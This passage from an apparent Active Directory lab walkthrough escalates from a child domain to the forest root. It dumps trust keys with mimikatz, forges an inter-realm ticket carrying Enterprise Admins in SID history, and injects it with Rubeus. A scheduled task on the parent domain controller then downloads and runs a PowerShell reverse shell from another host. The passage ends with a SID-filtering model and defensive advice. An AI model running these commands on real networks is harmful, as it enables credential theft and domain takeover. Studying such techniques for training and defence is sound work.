
First, let's dump the trust keys:

```powershell
.\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"
```

As we can see, we get the trust keys of every trust the domain has, including the one to the parent domain (the forest root):

```text
[dcorp-dc]: PS C:\Users\Administrator\Documents> .\BetterSafetyKatz.exe '"lsadump::trust /patch"' "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)
  [ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
    * aes256_hmac cfb1299ec914c29461e1b57009c8b39c9239aca222a86d748be4e6a953ac7ca4
    * aes128_hmac e5f04970548f0b240ee6947605fce7b5
    * rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
  [ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 6/27/2024 12:12:19 AM - CLEAR - 26 43 99 cb bb 6d 10 f0 04 37 57 bd fa 1f 77 d6 93 28 68 1f 5d 35 a8 e3 b1 25 46 e7
    * aes256_hmac 47641f8bc724115760c2ef5ab1941996dcef5be9bdce13bcf5057d3036694667
    * aes128_hmac 13c6b14ec690d6e5e17377bd9d285c8a
    * rc4_hmac_nt 68a7f836e94f9668b8a215d486f23a38
  [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
    * 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
    * aes256_hmac fd9f9e762002c3a0c0d3b4681ae0bd9f0abf1484a0a8c8523ddf325b4035ade7
    * aes128_hmac 9e9914fc26168e51a4d44a3851ec9506
    * rc4_hmac_nt 881744a51055cdda6698c535e629fc1d
  [Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 6/27/2024 12:11:53 AM - CLEAR - 9c fe ec 1b d3 ed ee 2f 21 34 aa f7 77 c1 6d 5e d6 65 50 6f 82 33 df 17 5c 3a 95 49
    * aes256_hmac 786dc532d32610fbe36bc004490091ad1c744186269195dd58ac9ac36b665fd0
    * aes128_hmac 276b6a9960f4158694f028405d7395a9
    * rc4_hmac_nt 881744a51055cdda6698c535e629fc1d

Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)
  [ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
    * aes256_hmac 64424a8f2a4def288b986a3747c3eed7493e1d75bfff0461afbb072180e61afe
    * aes128_hmac f4aaf5eb7059977b9ea4cde31ee8eddc
    * rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
  [ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:16:10 PM - CLEAR - cf e8 36 49 c3 08 a6 2a fe 76 d2 0a 0c 5c aa e5 67 a1 af f6 25 bb ec d0 ed 1e 08 5d
    * aes256_hmac 2bf47a8aca4420dbd00c836677489636bace0cf279d20387eae2c935f8816652
    * aes128_hmac 2ed7f416a3a42794e54e3b567eaa0e53
    * rc4_hmac_nt 214a518fb9edf4be816f207b9ba19d69
  [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
    * aes256_hmac fed485bb861c2a70cf8436cc2bc561bdd7502ff3f06a3e0116e93de860617216
    * aes128_hmac 25f49733618f43d90ac60661e0d45e6a
    * rc4_hmac_nt 5254e4d05c51a801670314042ae33f40
  [Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:03:04 PM - CLEAR - 0c f8 9f d9 54 46 8a 29 23 0c 65 1f 45 69 c8 c7 6d f0 5c bf eb 69 63 52 f9 3c 2a dd
    * aes256_hmac b589e722cc645c71e1b6743b64ec68ad4f2e6ffab7ca0fe7e40971713f4ac465
    * aes128_hmac 0dd190b6a2217e9f8dbc82d2b7e78e95
    * rc4_hmac_nt 5254e4d05c51a801670314042ae33f40

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)
  [ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
    * aes256_hmac 225bd65839ee11918c44d7a4819736245a4d54024173ef4a91ef5fb2c29669df
    * aes128_hmac aebc8f223defffec09befded2c30d6c4
    * rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
  [ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:16:07 PM - CLEAR - 55 cb 05 4c 82 1a 31 bb b8 2d c5 b9 cc fd 2d 3e 33 d5 e0 92 93 cf f9 ac 6f ac 11 ed
    * aes256_hmac 03dbd3425e6cc9aa87ed201713d7a8dbb04ef5c651407580a5b2c11e67bff85b
    * aes128_hmac 34de1a1db802e71580e907214774dcc9
    * rc4_hmac_nt 1fcd1aeb03aab0b98840321e4a0d17f3
  [ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
    * 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
    * aes256_hmac 684bc2d9fa516539e42ba27f8638ce273444b01768d23001bbbb1c96c2f3a7ca
    * aes128_hmac 6b81568547ccd72e875ba5bf92870f6c
    * rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7
  [Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL
    * 7/12/2024 10:03:00 PM - CLEAR - 10 fc b0 8b ae b3 a7 21 5f 52 40 d5 f7 e9 45 5a fe 6e ee dd da f7 4b 69 f6 c8 3d a9
    * aes256_hmac 903cd48563f50588d7993632939015e44f15edafe9e0d6ffdc55dec6e990f20c
    * aes128_hmac 1181192f6c730988662d1d43a55daba9
    * rc4_hmac_nt c1a089de694b99c31207cf85ca9401c7

mimikatz(commandline) # exit
Bye!
```
Now let's forge an inter-realm ticket: a TGT for the parent domain, encrypted with the trust key (the rc4_hmac_nt value for the MONEYCORP.LOCAL trust in the dump) and carrying the parent domain's Enterprise Admins SID (RID 519) in SID history via /sids:

```powershell
.\BetterSafetyKatz '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:68a7f836e94f9668b8a215d486f23a38 /service:krbtgt /ticket:c:\ad\tools\trust.kirbi"' "exit"
```

Nice! Now all we have to do is request a TGS from the MoneyCorp domain controller with the forged ticket and inject it into our session:

```powershell
Rubeus.exe asktgs /service:HOST/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ticket:c:\ad\tools\trust.kirbi /ptt
```

Let's list our tickets:

```powershell
klist
```

With a ticket for the HOST service on mcorp-dc, we can create a scheduled task on the DC that runs a reverse shell:

```powershell
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "mcorp\Administrator" /TN "STCheck" /TR "powershell.exe -c 'IEX(iwr http://172.16.100.22/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"
```

Now let's start the task:

```powershell
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck"
```
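Why the forged ticket above is accepted by the parent DC comes down to SID filtering on the trust. The following is an added example (not code from the original write-up or from any of the tools it uses) that models the filtering a trusting DC applies to the PAC of a ticket received over a trust, using the two domain SIDs from the dump and the RID 519 injected via /sids; the rule it implements is a simplification, and the real switch is the trust's SIDFilteringQuarantined attribute (visible with Get-ADTrust).

```python
# Added example, not part of the original write-up: a simplified model of the
# SID filtering a trusting DC applies to the PAC of a ticket that crossed a
# trust. Domain SIDs and the -519 RID are the ones used in the page above;
# the filtering rule is an approximation of Windows behaviour.

CHILD_SID = "S-1-5-21-719815819-3726368948-3917688648"   # dcorp, the trusted domain
PARENT_SID = "S-1-5-21-335606122-960912869-3279953914"   # mcorp, the trusting domain
ENTERPRISE_ADMINS = PARENT_SID + "-519"                    # RID 519 = Enterprise Admins

# RIDs that are privileged in any domain: Domain Admins, Schema Admins, Enterprise Admins
PRIVILEGED_RIDS = {"512", "518", "519"}


def domain_of(sid):
    """Domain part of an account or group SID (everything before the RID)."""
    return sid.rsplit("-", 1)[0]


def filter_pac_sids(trusted_domain_sid, pac_sids, quarantined):
    """Model of the SIDs a trusting DC keeps from a ticket that crossed a trust.

    With SID filtering (quarantine) on, only SIDs issued by the trusted domain
    survive; anything else in SID history / ExtraSids is dropped. With it off,
    the default for trusts inside one forest, every SID is accepted as-is.
    """
    kept, dropped = [], []
    for sid in pac_sids:
        if quarantined and domain_of(sid) != trusted_domain_sid:
            dropped.append(sid)
        else:
            kept.append(sid)
    return {"kept": kept, "dropped": dropped}


def privileged_sids_granted(result):
    """SIDs that survived filtering and carry a privileged RID."""
    return [s for s in result["kept"] if s.rsplit("-", 1)[1] in PRIVILEGED_RIDS]


# Constructed PAC of the ticket forged above: the child Administrator (500),
# the child's Domain Users (513) and the parent's Enterprise Admins in ExtraSids.
FORGED_PAC = [CHILD_SID + "-500", CHILD_SID + "-513", ENTERPRISE_ADMINS]

if __name__ == "__main__":
    for quarantined in (False, True):
        r = filter_pac_sids(CHILD_SID, FORGED_PAC, quarantined)
        print(f"quarantined={quarantined}: dropped={r['dropped']} "
              f"privileged SIDs granted={privileged_sids_granted(r)}")
```

Trusts inside one forest are not quarantined by default, and Microsoft's guidance is that the forest, not the domain, is the security boundary; the practical defence is therefore to protect every DC in the forest, and its trust keys, as strictly as the root.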